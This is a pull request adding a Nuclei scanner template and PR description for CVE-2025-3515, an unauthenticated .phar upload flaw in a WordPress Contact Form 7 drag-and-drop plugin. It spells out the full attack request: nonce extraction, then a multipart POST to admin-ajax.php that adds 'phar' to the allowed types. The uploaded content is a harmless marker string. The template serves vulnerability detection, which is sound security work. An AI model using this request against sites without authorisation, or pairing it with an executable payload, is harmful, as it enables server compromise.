### PR TITLE
Add CVE-2025-3515 – WordPress CF7 Drag & Drop Upload: Unauth .phar Upload (PoC)

### DIFF
--- a/http/cves/2025/CVE-2025-3515.yaml
+++ b/http/cves/2025/CVE-2025-3515.yaml
@@ -1,0 +1,115 @@
+id: CVE-2025-3515
+
+info:
+  name: WordPress CF7 Drag & Drop Upload <= 1.3.8.9 – Unauth .phar Upload (PoC)
+  author: gsharma101
+  severity: high
+  description: >
+    Extracts ajax_nonce and field id from a public page, then attempts an unauthenticated
+    .phar upload via admin-ajax.php?action=dnd_codedropz_upload. Proof of concept only.
+  classification:
+    cve-id: CVE-2025-3515
+    cwe-id: CWE-434
+  reference:
+    - https://github.com/projectdiscovery/nuclei-templates/issues/13029
+    - https://wpscan.com/plugin/drag-and-drop-multiple-file-upload-contact-form-7/
+  tags: wordpress,wp-plugin,contactform7,fileupload,phar,cve,cve2025,intrusive
+
+variables:
+  page_path: "/?page_id=9"
+
+http:
+  - raw:
+      # 1) Load public page to capture ajax_nonce + field id
+      - |
+        GET {{page_path}} HTTP/1.1
+        Host: {{Hostname}}
+
+      # 2) Try uploading a .phar using that nonce
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
+        Referer: {{BaseURL}}{{page_path}}
+        X-Requested-With: XMLHttpRequest
+        Accept-Encoding: gzip
+
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="supported_type"
+
+        jpeg|png|jpg|gif|txt|phar
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="size_limit"
+
+        5242880
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="action"
+
+        dnd_codedropz_upload
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="type"
+
+        click
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="security"
+
+        {{ajax_nonce}}
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="nonce"
+
+        {{ajax_nonce}}
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="id"
+
+        {{field_id}}
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="version"
+
+        free version 1.3.9.0
+        -----------------------------735323031399963166993862150
+        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.phar"
+        Content-Type: application/octet-stream
+
+        HELLO-NUCLEI-TEST-{{randstr}}
+        -----------------------------735323031399963166993862150--
+
+    extractors:
+      # ajax_nonce from inline JS config
+      - type: regex
+        name: ajax_nonce
+        internal: true
+        part: body_1
+        group: 1
+        regex:
+          - "\"ajax_nonce\"\\s*:\\s*\"([A-Za-z0-9]+)\""
+
+      # form field id
+      - type: regex
+        name: field_id
+        internal: true
+        part: body_1
+        group: 1
+        regex:
+          - "data-id=[\\\"'](\\d+)[\\\"']"
+
+      # file path in JSON (strict: must include our randstr)
+      - type: regex
+        name: file_path
+        internal: true
+        part: body_2
+        group: 1
+        regex:
+          - "(/wp-content/uploads/[^\\\"\\s]*{{randstr}}\\.phar)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      # Either explicit success flag or an echoed uploads path
+      - type: word
+        part: body_2
+        condition: or
+        words:
+          - "\"success\":true"
+          - "/wp-content/uploads"

--- a/http/cves/2025/CVE-2025-3515.yaml
+++ b/http/cves/2025/CVE-2025-3515.yaml
@@ -6,14 +6,14 @@ info:
   severity: high
   description: >
     Extracts ajax_nonce and field id from a public page, then attempts an unauthenticated
-    .phar upload via admin-ajax.php?action=dnd_codedropz_upload. Proof of concept only.
+    .phar upload via admin-ajax.php?action=dnd_codedropz_upload. Intrusive PoC only; payload is non-executable.
   classification:
     cve-id: CVE-2025-3515
     cwe-id: CWE-434
   reference:
     - https://github.com/projectdiscovery/nuclei-templates/issues/13029
     - https://wpscan.com/plugin/drag-and-drop-multiple-file-upload-contact-form-7/
-  tags: wordpress,wp-plugin,contactform7,fileupload,phar,cve,cve2025,intrusive
+  tags: wordpress,wp-plugin,wordpress-plugin,contactform7,drag-and-drop-multiple-file-upload-contact-form-7,fileupload,phar,cve,cve2025,intrusive
 
 variables:
   page_path: "/?page_id=9"
@@ -63,10 +63,6 @@ http:
 
         {{field_id}}
         -----------------------------735323031399963166993862150
-        Content-Disposition: form-data; name="version"
-
-        free version 1.3.9.0
-        -----------------------------735323031399963166993862150
         Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.phar"
         Content-Type: application/octet-stream
 
@@ -81,7 +77,7 @@ http:
         part: body_1
         group: 1
         regex:
-          - "\"ajax_nonce\"\\s*:\\s*\"([A-Za-z0-9]+)\""
+          - "\"ajax_nonce\"\\s*:\\s*\"([A-Za-z0-9_-]+)\""
 
       # form field id
       - type: regex
@@ -106,10 +102,13 @@ http:
       - type: status
         status:
           - 200
-      # Either explicit success flag or an echoed uploads path
+      # Require success flag
       - type: word
         part: body_2
-        condition: or
         words:
           - "\"success\":true"
-          - "/wp-content/uploads"
+      # And require our exact uploaded filename to appear in the JSON/path
+      - type: regex
+        part: body_2
+        regex:
+          - "/wp-content/uploads/[^\"\\s]*{{randstr}}\\.phar"


### PR DESCRIPTION
**What’s included**

Adds a new Nuclei template for **CVE-2025-3515** affecting the WordPress plugin **Drag & Drop Multiple File Upload – Contact Form 7** (CF7 DnD). Vulnerable versions `<= 1.3.8.9` allow an unauthenticated `.phar` upload via `admin-ajax.php` using a front-end nonce.

* **Path:** `http/cves/2025/CVE-2025-3515.yaml`
* **ID:** `CVE-2025-3515`
* **Severity:** `high`
* **Tags:** `wordpress, wp-plugin, contactform7, fileupload, phar, cve, cve2025, intrusive`
* **Author:** `@gsharma101`

**Technique / Detection logic**

1. Load a public page (configurable `page_path`) containing the CF7 DnD field.
2. Extract `ajax_nonce` from the inline `dnd_cf7_uploader` config and the file field `data-id`.
3. Send `POST /wp-admin/admin-ajax.php` with `action=dnd_codedropz_upload`, the extracted nonce/id, and a benign payload named `{{randstr}}.phar`.
4. Treat success on vulnerable versions as either `"success": true` or a returned uploads path containing our `{{randstr}}.phar`.

**Why intrusive**

This template performs an actual file upload (benign, short content) for proof-of-concept verification, so it is marked **`intrusive`**. It does **not** attempt execution.

**Test notes**

* On a patched target running plugin **free version 1.3.9.0**, the endpoint returns: `{"success":false,"data":"Uploaded file is not allowed for file type"}` and the template yields **no match** (expected).
* Positive results are expected on versions `<= 1.3.8.9` where the upload is accepted and the path is returned.

**Usage**

```bash
nuclei -t http/cves/2025/CVE-2025-3515.yaml \
  -u https://target.example \
  -var page_path="/?page_id=9" \
  -vv
```

`page_path` is overridable to point at any public page that renders the CF7 DnD field.

**References**

* [https://github.com/projectdiscovery/nuclei-templates/issues/13029](https://github.com/projectdiscovery/nuclei-templates/issues/13029)
* [https://wpscan.com/plugin/drag-and-drop-multiple-file-upload-contact-form-7/](https://wpscan.com/plugin/drag-and-drop-multiple-file-upload-contact-form-7/)

**Checklist**

* [x] Passes `nuclei -validate`
* [x] Uses `{{randstr}}` for unique test artifacts
* [x] Clear references and CVE metadata
* [x] Marked `intrusive`; PoC payload is minimal and non-executing
* [x] Works with default headers; variable for front-end page path included
